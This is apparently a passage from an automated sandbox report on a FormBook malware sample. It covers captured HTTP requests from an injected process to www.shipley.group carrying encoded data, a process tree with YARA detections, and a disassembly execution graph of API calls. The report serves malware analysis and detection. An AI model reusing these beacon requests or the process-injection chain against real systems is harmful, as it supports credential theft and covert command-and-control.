                                                                  Data Ascii: 3h=FyRa10L5EzB16WbMHP6SUs1GVw0fGu0kH5KXsT9RKQLbL9whvbDLFUUZX99iYyDXzNDbOtW6ZPZg+mt+zCye8mZyIGa5y+vFHjAaKiHGon4UIyTBT/hfKrspro209193k8eUGv9YvPmEWlWTSAWbIbVOgJpC4/U20qt9YarbJYLh1lIVNuIy0qvyf6nLeIaTFmnd5MhE70fT5i6MnjBYoxUkkvDNfH/9csk3h5WK+0YYhYut3SAR49eN3D/kUtX6rBHUhlpExGN808JuwRn+W7FuFkIWHXR7c/PKpOCeFnVx8Ea6/OVa6Gbj83OTBK5ZMnXZmqN7OSPj3cnQH9CJ6mTuFlM7pyUPtpKzdeGCAexmzS3BEQn9m9w6YvWN0WbVQrekxTeZ05EIue5VpXX0l555gY3szSHjOtzu+jIJrD2ZY1DuugLA4/5ytF/+woumqGU4SqMEwhEuGfbqRdh8QkSKjkmr2zDfbzXRgJITDncnR+lJzGqZCefVwd8sP8xyDFqrScEXq6+7E09VI4WwdlcbOzrjP+CSn2BO6/qbs1dTvwHUfyOyYz3VoJ0OQ7/DsurIl93w/NlhmKicguy4jtkIWKod/9GCJFpWLWF04npJFQW+qz7FMU8ya75lXODMGSqh6PtaC0AOqccfHjbO6wVMfOji9hMxIbT+vwUylbOsZlC9EVphuK+vijeYmQeIBDsx5JqtqlUxe0PwECtyUmSIery4vJE/+z7cDROsYzhGLdSO3S2EWQiuFrSjms9kfNRM5XxcX7SjIOLmQZun7Vtk68SXuf8CgUsaDK7JJzpIqt8S2BZ148K5V8TDWBD+GmUSYbFznaTcldrVFjGFGNpsmGzKvhVzfP3lzKKUF5zAuKczzpraC9E0xRZpavRikRPV7JeYQfGKiTtsMizYeYC4oKZTd+gayz/WuXAlTXVVIZXxa4BnYRIwecFeSlN3ArWoCDFI1uge4rkWoJsc2YFPxVMCVZQLUke4N2Rnh5ukFEoIb [TRUNCATED]
                                                                  Jan 10, 2025 18:53:34.086782932 CET73INHTTP/1.1 405 Method Not Allowed
                                                                  content-length: 0
                                                                  connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  40192.168.2.45004213.248.169.48801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:53:36.068082094 CET459OUTGET /5g1j/?3h=Iw562B7TPAI32gTWbsa7SZB9B1g4T8AuAaaNtg53EDLPQ9knn4W1dXgxSIR1GiDQ5ebaMc+5dfd+z2pa5yiwp35RXETqktnTD0YqfDOBtHcvCUTPdpJ9O6Q=&Ol=yN0LtN-HDTPXX HTTP/1.1
                                                                  Host: www.shipley.group
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-us
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Jan 10, 2025 18:53:39.659254074 CET376INHTTP/1.1 200 OK
                                                                  content-type: text/html
                                                                  date: Fri, 10 Jan 2025 17:53:39 GMT
                                                                  content-length: 255
                                                                  connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 33 68 3d 49 77 35 36 32 42 37 54 50 41 49 33 32 67 54 57 62 73 61 37 53 5a 42 39 42 31 67 34 54 38 41 75 41 61 61 4e 74 67 35 33 45 44 4c 50 51 39 6b 6e 6e 34 57 31 64 58 67 78 53 49 52 31 47 69 44 51 35 65 62 61 4d 63 2b 35 64 66 64 2b 7a 32 70 61 35 79 69 77 70 33 35 52 58 45 54 71 6b 74 6e 54 44 30 59 71 66 44 4f 42 74 48 63 76 43 55 54 50 64 70 4a 39 4f 36 51 3d 26 4f 6c 3d 79 4e 30 4c 74 4e 2d 48 44 54 50 58 58 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?3h=Iw562B7TPAI32gTWbsa7SZB9B1g4T8AuAaaNtg53EDLPQ9knn4W1dXgxSIR1GiDQ5ebaMc+5dfd+z2pa5yiwp35RXETqktnTD0YqfDOBtHcvCUTPdpJ9O6Q=&Ol=yN0LtN-HDTPXX"}</script></head></html>


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:12:50:30
                                                                  Start date:10/01/2025
                                                                  Path:C:\Users\user\Desktop\3HnH4uJtE7.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\3HnH4uJtE7.exe"
                                                                  Imagebase:0x8e0000
                                                                  File size:1'401'344 bytes
                                                                  MD5 hash:B88BAB75A48B9FEFCD3395AFA9891D69
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:1
                                                                  Start time:12:50:33
                                                                  Start date:10/01/2025
                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\3HnH4uJtE7.exe"
                                                                  Imagebase:0xee0000
                                                                  File size:46'504 bytes
                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1962969685.00000000031C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1962529025.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1963457204.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:3
                                                                  Start time:12:50:48
                                                                  Start date:10/01/2025
                                                                  Path:C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe"
                                                                  Imagebase:0x6d0000
                                                                  File size:140'800 bytes
                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3560926994.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:6
                                                                  Start time:12:50:49
                                                                  Start date:10/01/2025
                                                                  Path:C:\Windows\SysWOW64\wiaacmgr.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\SysWOW64\wiaacmgr.exe"
                                                                  Imagebase:0xc60000
                                                                  File size:84'480 bytes
                                                                  MD5 hash:2F1D379CE47E920BDDD2C50214457E0F
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3561027868.0000000004410000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3561060314.0000000004460000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3560023676.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:7
                                                                  Start time:12:51:02
                                                                  Start date:10/01/2025
                                                                  Path:C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe"
                                                                  Imagebase:0x6d0000
                                                                  File size:140'800 bytes
                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:8
                                                                  Start time:12:51:14
                                                                  Start date:10/01/2025
                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                  Imagebase:0x7ff6bf500000
                                                                  File size:676'768 bytes
                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Disassembly

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:2.9%
                                                                    Dynamic/Decrypted Code Coverage:1.9%
                                                                    Signature Coverage:3.4%
                                                                    Total number of Nodes:1837
                                                                    Total number of Limit Nodes:50
                                                                    execution_graph 96339 8e1cad SystemParametersInfoW 96340 be1b78 96354 bdf7c8 96340->96354 96342 be1c24 96357 be1a68 96342->96357 96344 be1c4d CreateFileW 96346 be1ca1 96344->96346 96347 be1c9c 96344->96347 96346->96347 96348 be1cb8 VirtualAlloc 96346->96348 96348->96347 96349 be1cd6 ReadFile 96348->96349 96349->96347 96350 be1cf1 96349->96350 96351 be0a68 13 API calls 96350->96351 96352 be1d24 96351->96352 96353 be1d47 ExitProcess 96352->96353 96353->96347 96360 be2c48 GetPEB 96354->96360 96356 bdfe53 96356->96342 96358 be1a71 Sleep 96357->96358 96359 be1a7f 96358->96359 96361 be2c72 96360->96361 96361->96356 96362 933f75 96373 8fceb1 96362->96373 96364 933f8b 96372 934006 96364->96372 96440 8fe300 23 API calls 96364->96440 96367 934052 96369 934a88 96367->96369 96442 95359c 82 API calls __wsopen_s 96367->96442 96370 933fe6 96370->96367 96441 951abf 22 API calls 96370->96441 96382 8ebf40 96372->96382 96374 8fcebf 96373->96374 96375 8fced2 96373->96375 96443 8eaceb 23 API calls messages 96374->96443 96377 8fced7 96375->96377 96378 8fcf05 96375->96378 96444 8ffddb 96377->96444 96454 8eaceb 23 API calls messages 96378->96454 96381 8fcec9 96381->96364 96467 8eadf0 96382->96467 96384 8ebf9d 96385 9304b6 96384->96385 96386 8ebfa9 96384->96386 96496 95359c 82 API calls __wsopen_s 96385->96496 96387 8ec01e 96386->96387 96388 9304c6 96386->96388 96472 8eac91 96387->96472 96497 95359c 82 API calls __wsopen_s 96388->96497 96392 947120 22 API calls 96426 8ec039 __fread_nolock messages 96392->96426 96393 8ec7da 96485 8ffe0b 96393->96485 96399 9304f5 96403 93055a 96399->96403 96498 8fd217 235 API calls 96399->96498 96402 8ec808 __fread_nolock 96407 8ffe0b 22 API calls 96402->96407 96439 8ec603 96403->96439 96499 95359c 82 API calls __wsopen_s 96403->96499 96404 8ffddb 22 API calls 96404->96426 96405 8eaf8a 22 API calls 96405->96426 96406 93091a 96533 953209 23 API calls 96406->96533 96427 8ec350 __fread_nolock messages 96407->96427 96410 8eec40 235 API calls 96410->96426 96411 9308a5 96507 8eec40 96411->96507 96414 9308cf 96414->96439 96531 8ea81b 41 API calls 96414->96531 96415 930591 96500 95359c 82 API calls __wsopen_s 96415->96500 96416 9308f6 96532 95359c 82 API calls __wsopen_s 96416->96532 96420 8ebbe0 40 API calls 96420->96426 96422 8ec3ac 96422->96367 96423 8ec237 96425 8ec253 96423->96425 96534 8ea8c7 96423->96534 96430 930976 96425->96430 96434 8ec297 messages 96425->96434 96426->96392 96426->96393 96426->96399 96426->96402 96426->96403 96426->96404 96426->96405 96426->96406 96426->96410 96426->96411 96426->96415 96426->96416 96426->96420 96426->96423 96429 8ffe0b 22 API calls 96426->96429 96433 9309bf 96426->96433 96426->96439 96476 8ead81 96426->96476 96501 947099 22 API calls __fread_nolock 96426->96501 96502 965745 54 API calls _wcslen 96426->96502 96503 8faa42 22 API calls messages 96426->96503 96504 94f05c 40 API calls 96426->96504 96505 8ea993 41 API calls 96426->96505 96506 8eaceb 23 API calls messages 96426->96506 96427->96422 96495 8fce17 22 API calls messages 96427->96495 96429->96426 96538 8eaceb 23 API calls messages 96430->96538 96433->96439 96539 95359c 82 API calls __wsopen_s 96433->96539 96434->96433 96483 8eaceb 23 API calls messages 96434->96483 96436 8ec335 96436->96433 96437 8ec342 96436->96437 96484 8ea704 22 API calls messages 96437->96484 96439->96367 96440->96370 96441->96372 96442->96369 96443->96381 96447 8ffde0 96444->96447 96446 8ffdfa 96446->96381 96447->96446 96450 8ffdfc 96447->96450 96455 90ea0c 96447->96455 96462 904ead 7 API calls 2 library calls 96447->96462 96449 90066d 96464 9032a4 RaiseException 96449->96464 96450->96449 96463 9032a4 RaiseException 96450->96463 96453 90068a 96453->96381 96454->96381 96461 913820 __dosmaperr 96455->96461 96456 91385e 96466 90f2d9 20 API calls __dosmaperr 96456->96466 96458 913849 RtlAllocateHeap 96459 91385c 96458->96459 96458->96461 96459->96447 96461->96456 96461->96458 96465 904ead 7 API calls 2 library calls 96461->96465 96462->96447 96463->96449 96464->96453 96465->96461 96466->96459 96468 8eae01 96467->96468 96471 8eae1c messages 96467->96471 96540 8eaec9 96468->96540 96470 8eae09 CharUpperBuffW 96470->96471 96471->96384 96473 8eacae 96472->96473 96475 8eacd1 96473->96475 96546 95359c 82 API calls __wsopen_s 96473->96546 96475->96426 96477 92fadb 96476->96477 96478 8ead92 96476->96478 96479 8ffddb 22 API calls 96478->96479 96480 8ead99 96479->96480 96547 8eadcd 96480->96547 96483->96436 96484->96427 96488 8ffddb 96485->96488 96486 90ea0c ___std_exception_copy 21 API calls 96486->96488 96487 8ffdfa 96487->96402 96488->96486 96488->96487 96490 8ffdfc 96488->96490 96559 904ead 7 API calls 2 library calls 96488->96559 96494 90066d 96490->96494 96560 9032a4 RaiseException 96490->96560 96493 90068a 96493->96402 96561 9032a4 RaiseException 96494->96561 96495->96427 96496->96388 96497->96439 96498->96403 96499->96439 96500->96439 96501->96426 96502->96426 96503->96426 96504->96426 96505->96426 96506->96426 96529 8eec76 messages 96507->96529 96508 900242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96508->96529 96509 9000a3 29 API calls pre_c_initialization 96509->96529 96510 9001f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96510->96529 96512 8ffddb 22 API calls 96512->96529 96513 8efef7 96518 8ea8c7 22 API calls 96513->96518 96525 8eed9d messages 96513->96525 96515 934b0b 96565 95359c 82 API calls __wsopen_s 96515->96565 96516 8ea8c7 22 API calls 96516->96529 96517 934600 96521 8ea8c7 22 API calls 96517->96521 96517->96525 96518->96525 96521->96525 96523 8efbe3 96523->96525 96526 934bdc 96523->96526 96530 8ef3ae messages 96523->96530 96524 8ea961 22 API calls 96524->96529 96525->96414 96566 95359c 82 API calls __wsopen_s 96526->96566 96528 934beb 96567 95359c 82 API calls __wsopen_s 96528->96567 96529->96508 96529->96509 96529->96510 96529->96512 96529->96513 96529->96515 96529->96516 96529->96517 96529->96523 96529->96524 96529->96525 96529->96528 96529->96530 96562 8f01e0 235 API calls 2 library calls 96529->96562 96563 8f06a0 41 API calls messages 96529->96563 96530->96525 96564 95359c 82 API calls __wsopen_s 96530->96564 96531->96416 96532->96439 96533->96423 96535 8ea8ea __fread_nolock 96534->96535 96536 8ea8db 96534->96536 96535->96425 96536->96535 96537 8ffe0b 22 API calls 96536->96537 96537->96535 96538->96433 96539->96439 96541 8eaedc 96540->96541 96545 8eaed9 __fread_nolock 96540->96545 96542 8ffddb 22 API calls 96541->96542 96543 8eaee7 96542->96543 96544 8ffe0b 22 API calls 96543->96544 96544->96545 96545->96470 96546->96475 96551 8eaddd 96547->96551 96548 8eadb6 96548->96426 96549 8ffddb 22 API calls 96549->96551 96551->96548 96551->96549 96552 8ea8c7 22 API calls 96551->96552 96553 8eadcd 22 API calls 96551->96553 96554 8ea961 96551->96554 96552->96551 96553->96551 96555 8ffe0b 22 API calls 96554->96555 96556 8ea976 96555->96556 96557 8ffddb 22 API calls 96556->96557 96558 8ea984 96557->96558 96558->96551 96559->96488 96560->96494 96561->96493 96562->96529 96563->96529 96564->96525 96565->96525 96566->96528 96567->96525 96568 8e1044 96573 8e10f3 96568->96573 96570 8e104a 96609 9000a3 29 API calls __onexit 96570->96609 96572 8e1054 96610 8e1398 96573->96610 96577 8e116a 96578 8ea961 22 API calls 96577->96578 96579 8e1174 96578->96579 96580 8ea961 22 API calls 96579->96580 96581 8e117e 96580->96581 96582 8ea961 22 API calls 96581->96582 96583 8e1188 96582->96583 96584 8ea961 22 API calls 96583->96584 96585 8e11c6 96584->96585 96586 8ea961 22 API calls 96585->96586 96587 8e1292 96586->96587 96620 8e171c 96587->96620 96591 8e12c4 96592 8ea961 22 API calls 96591->96592 96593 8e12ce 96592->96593 96641 8f1940 96593->96641 96595 8e12f9 96651 8e1aab 96595->96651 96597 8e1315 96598 8e1325 GetStdHandle 96597->96598 96599 8e137a 96598->96599 96600 922485 96598->96600 96604 8e1387 OleInitialize 96599->96604 96600->96599 96601 92248e 96600->96601 96602 8ffddb 22 API calls 96601->96602 96603 922495 96602->96603 96658 95011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 96603->96658 96604->96570 96606 92249e 96659 950944 CreateThread 96606->96659 96608 9224aa CloseHandle 96608->96599 96609->96572 96660 8e13f1 96610->96660 96613 8e13f1 22 API calls 96614 8e13d0 96613->96614 96615 8ea961 22 API calls 96614->96615 96616 8e13dc 96615->96616 96667 8e6b57 96616->96667 96618 8e1129 96619 8e1bc3 6 API calls 96618->96619 96619->96577 96621 8ea961 22 API calls 96620->96621 96622 8e172c 96621->96622 96623 8ea961 22 API calls 96622->96623 96624 8e1734 96623->96624 96625 8ea961 22 API calls 96624->96625 96626 8e174f 96625->96626 96627 8ffddb 22 API calls 96626->96627 96628 8e129c 96627->96628 96629 8e1b4a 96628->96629 96630 8e1b58 96629->96630 96631 8ea961 22 API calls 96630->96631 96632 8e1b63 96631->96632 96633 8ea961 22 API calls 96632->96633 96634 8e1b6e 96633->96634 96635 8ea961 22 API calls 96634->96635 96636 8e1b79 96635->96636 96637 8ea961 22 API calls 96636->96637 96638 8e1b84 96637->96638 96639 8ffddb 22 API calls 96638->96639 96640 8e1b96 RegisterWindowMessageW 96639->96640 96640->96591 96642 8f195d 96641->96642 96643 8f1981 96641->96643 96650 8f196e 96642->96650 96686 900242 5 API calls __Init_thread_wait 96642->96686 96684 900242 5 API calls __Init_thread_wait 96643->96684 96645 8f198b 96645->96642 96685 9001f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96645->96685 96647 8f8727 96647->96650 96687 9001f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96647->96687 96650->96595 96652 8e1abb 96651->96652 96653 92272d 96651->96653 96655 8ffddb 22 API calls 96652->96655 96688 953209 23 API calls 96653->96688 96656 8e1ac3 96655->96656 96656->96597 96657 922738 96658->96606 96659->96608 96689 95092a 28 API calls 96659->96689 96661 8ea961 22 API calls 96660->96661 96662 8e13fc 96661->96662 96663 8ea961 22 API calls 96662->96663 96664 8e1404 96663->96664 96665 8ea961 22 API calls 96664->96665 96666 8e13c6 96665->96666 96666->96613 96668 924ba1 96667->96668 96671 8e6b67 _wcslen 96667->96671 96680 8e93b2 96668->96680 96670 924baa 96670->96670 96672 8e6b7d 96671->96672 96673 8e6ba2 96671->96673 96679 8e6f34 22 API calls 96672->96679 96675 8ffddb 22 API calls 96673->96675 96677 8e6bae 96675->96677 96676 8e6b85 __fread_nolock 96676->96618 96678 8ffe0b 22 API calls 96677->96678 96678->96676 96679->96676 96681 8e93c0 96680->96681 96683 8e93c9 __fread_nolock 96680->96683 96682 8eaec9 22 API calls 96681->96682 96681->96683 96682->96683 96683->96670 96684->96645 96685->96642 96686->96647 96687->96650 96688->96657 96690 9003fb 96691 900407 ___BuildCatchObject 96690->96691 96719 8ffeb1 96691->96719 96693 90040e 96694 900561 96693->96694 96697 900438 96693->96697 96746 90083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 96694->96746 96696 900568 96747 904e52 28 API calls _abort 96696->96747 96707 900477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 96697->96707 96730 91247d 96697->96730 96699 90056e 96748 904e04 28 API calls _abort 96699->96748 96703 900576 96704 900457 96706 9004d8 96738 900959 96706->96738 96707->96706 96742 904e1a 38 API calls 3 library calls 96707->96742 96710 9004de 96711 9004f3 96710->96711 96743 900992 GetModuleHandleW 96711->96743 96713 9004fa 96713->96696 96714 9004fe 96713->96714 96715 900507 96714->96715 96744 904df5 28 API calls _abort 96714->96744 96745 900040 13 API calls 2 library calls 96715->96745 96718 90050f 96718->96704 96720 8ffeba 96719->96720 96749 900698 IsProcessorFeaturePresent 96720->96749 96722 8ffec6 96750 902c94 10 API calls 3 library calls 96722->96750 96724 8ffecb 96729 8ffecf 96724->96729 96751 912317 96724->96751 96727 8ffee6 96727->96693 96729->96693 96731 912494 96730->96731 96732 900a8c CatchGuardHandler 5 API calls 96731->96732 96733 900451 96732->96733 96733->96704 96734 912421 96733->96734 96735 912450 96734->96735 96736 900a8c CatchGuardHandler 5 API calls 96735->96736 96737 912479 96736->96737 96737->96707 96826 902340 96738->96826 96740 90096c GetStartupInfoW 96741 90097f 96740->96741 96741->96710 96742->96706 96743->96713 96744->96715 96745->96718 96746->96696 96747->96699 96748->96703 96749->96722 96750->96724 96755 91d1f6 96751->96755 96754 902cbd 8 API calls 3 library calls 96754->96729 96758 91d213 96755->96758 96759 91d20f 96755->96759 96757 8ffed8 96757->96727 96757->96754 96758->96759 96761 914bfb 96758->96761 96773 900a8c 96759->96773 96762 914c07 ___BuildCatchObject 96761->96762 96780 912f5e EnterCriticalSection 96762->96780 96764 914c0e 96781 9150af 96764->96781 96766 914c1d 96767 914c2c 96766->96767 96794 914a8f 29 API calls 96766->96794 96796 914c48 LeaveCriticalSection _abort 96767->96796 96770 914c27 96795 914b45 GetStdHandle GetFileType 96770->96795 96771 914c3d __fread_nolock 96771->96758 96774 900a95 96773->96774 96775 900a97 IsProcessorFeaturePresent 96773->96775 96774->96757 96777 900c5d 96775->96777 96825 900c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96777->96825 96779 900d40 96779->96757 96780->96764 96782 9150bb ___BuildCatchObject 96781->96782 96783 9150c8 96782->96783 96784 9150df 96782->96784 96805 90f2d9 20 API calls __dosmaperr 96783->96805 96797 912f5e EnterCriticalSection 96784->96797 96787 9150cd 96806 9127ec 26 API calls pre_c_initialization 96787->96806 96789 9150d7 __fread_nolock 96789->96766 96790 915117 96807 91513e LeaveCriticalSection _abort 96790->96807 96792 9150eb 96792->96790 96798 915000 96792->96798 96794->96770 96795->96767 96796->96771 96797->96792 96808 914c7d 96798->96808 96800 915012 96804 91501f 96800->96804 96815 913405 11 API calls 2 library calls 96800->96815 96802 915071 96802->96792 96816 9129c8 96804->96816 96805->96787 96806->96789 96807->96789 96809 914c8a __dosmaperr 96808->96809 96810 914cca 96809->96810 96811 914cb5 RtlAllocateHeap 96809->96811 96822 904ead 7 API calls 2 library calls 96809->96822 96823 90f2d9 20 API calls __dosmaperr 96810->96823 96811->96809 96812 914cc8 96811->96812 96812->96800 96815->96800 96817 9129d3 RtlFreeHeap 96816->96817 96821 9129fc __dosmaperr 96816->96821 96818 9129e8 96817->96818 96817->96821 96824 90f2d9 20 API calls __dosmaperr 96818->96824 96820 9129ee GetLastError 96820->96821 96821->96802 96822->96809 96823->96812 96824->96820 96825->96779 96827 902357 96826->96827 96827->96740 96827->96827 96828 8e2de3 96829 8e2df0 __wsopen_s 96828->96829 96830 8e2e09 96829->96830 96831 922c2b ___scrt_fastfail 96829->96831 96844 8e3aa2 96830->96844 96833 922c47 GetOpenFileNameW 96831->96833 96835 922c96 96833->96835 96837 8e6b57 22 API calls 96835->96837 96839 922cab 96837->96839 96839->96839 96841 8e2e27 96872 8e44a8 96841->96872 96902 921f50 96844->96902 96847 8e3ace 96849 8e6b57 22 API calls 96847->96849 96848 8e3ae9 96908 8ea6c3 96848->96908 96851 8e3ada 96849->96851 96904 8e37a0 96851->96904 96854 8e2da5 96855 921f50 __wsopen_s 96854->96855 96856 8e2db2 GetLongPathNameW 96855->96856 96857 8e6b57 22 API calls 96856->96857 96858 8e2dda 96857->96858 96859 8e3598 96858->96859 96860 8ea961 22 API calls 96859->96860 96861 8e35aa 96860->96861 96862 8e3aa2 23 API calls 96861->96862 96863 8e35b5 96862->96863 96864 9232eb 96863->96864 96865 8e35c0 96863->96865 96870 92330d 96864->96870 96926 8fce60 41 API calls 96864->96926 96914 8e515f 96865->96914 96871 8e35df 96871->96841 96927 8e4ecb 96872->96927 96875 923833 96949 952cf9 96875->96949 96877 8e4ecb 94 API calls 96879 8e44e1 96877->96879 96878 923848 96880 923869 96878->96880 96881 92384c 96878->96881 96879->96875 96882 8e44e9 96879->96882 96884 8ffe0b 22 API calls 96880->96884 96976 8e4f39 96881->96976 96885 923854 96882->96885 96886 8e44f5 96882->96886 96895 9238ae 96884->96895 96982 94da5a 82 API calls 96885->96982 96975 8e940c 136 API calls 2 library calls 96886->96975 96889 8e2e31 96890 923862 96890->96880 96891 923a5f 96893 923a67 96891->96893 96892 8e4f39 68 API calls 96892->96893 96893->96892 96988 94989b 82 API calls __wsopen_s 96893->96988 96895->96891 96895->96893 96899 8e9cb3 22 API calls 96895->96899 96983 94967e 22 API calls __fread_nolock 96895->96983 96984 9495ad 42 API calls _wcslen 96895->96984 96985 950b5a 22 API calls 96895->96985 96986 8ea4a1 22 API calls __fread_nolock 96895->96986 96987 8e3ff7 22 API calls 96895->96987 96899->96895 96903 8e3aaf GetFullPathNameW 96902->96903 96903->96847 96903->96848 96905 8e37ae 96904->96905 96906 8e93b2 22 API calls 96905->96906 96907 8e2e12 96906->96907 96907->96854 96909 8ea6dd 96908->96909 96910 8ea6d0 96908->96910 96911 8ffddb 22 API calls 96909->96911 96910->96851 96912 8ea6e7 96911->96912 96913 8ffe0b 22 API calls 96912->96913 96913->96910 96915 8e516e 96914->96915 96919 8e518f __fread_nolock 96914->96919 96917 8ffe0b 22 API calls 96915->96917 96916 8ffddb 22 API calls 96918 8e35cc 96916->96918 96917->96919 96920 8e35f3 96918->96920 96919->96916 96921 8e3605 96920->96921 96925 8e3624 __fread_nolock 96920->96925 96924 8ffe0b 22 API calls 96921->96924 96922 8ffddb 22 API calls 96923 8e363b 96922->96923 96923->96871 96924->96925 96925->96922 96926->96864 96989 8e4e90 LoadLibraryA 96927->96989 96932 8e4ef6 LoadLibraryExW 96997 8e4e59 LoadLibraryA 96932->96997 96933 923ccf 96935 8e4f39 68 API calls 96933->96935 96937 923cd6 96935->96937 96939 8e4e59 3 API calls 96937->96939 96941 923cde 96939->96941 96940 8e4f20 96940->96941 96942 8e4f2c 96940->96942 97019 8e50f5 96941->97019 96943 8e4f39 68 API calls 96942->96943 96946 8e44cd 96943->96946 96946->96875 96946->96877 96948 923d05 96950 952d15 96949->96950 96951 8e511f 64 API calls 96950->96951 96952 952d29 96951->96952 97153 952e66 96952->97153 96955 8e50f5 40 API calls 96956 952d56 96955->96956 96957 8e50f5 40 API calls 96956->96957 96958 952d66 96957->96958 96959 8e50f5 40 API calls 96958->96959 96960 952d81 96959->96960 96961 8e50f5 40 API calls 96960->96961 96962 952d9c 96961->96962 96963 8e511f 64 API calls 96962->96963 96964 952db3 96963->96964 96965 90ea0c ___std_exception_copy 21 API calls 96964->96965 96966 952dba 96965->96966 96967 90ea0c ___std_exception_copy 21 API calls 96966->96967 96968 952dc4 96967->96968 96969 8e50f5 40 API calls 96968->96969 96970 952dd8 96969->96970 96971 9528fe 27 API calls 96970->96971 96972 952dee 96971->96972 96974 952d3f 96972->96974 97159 9522ce 79 API calls 96972->97159 96974->96878 96975->96889 96977 8e4f43 96976->96977 96981 8e4f4a 96976->96981 97160 90e678 96977->97160 96979 8e4f6a 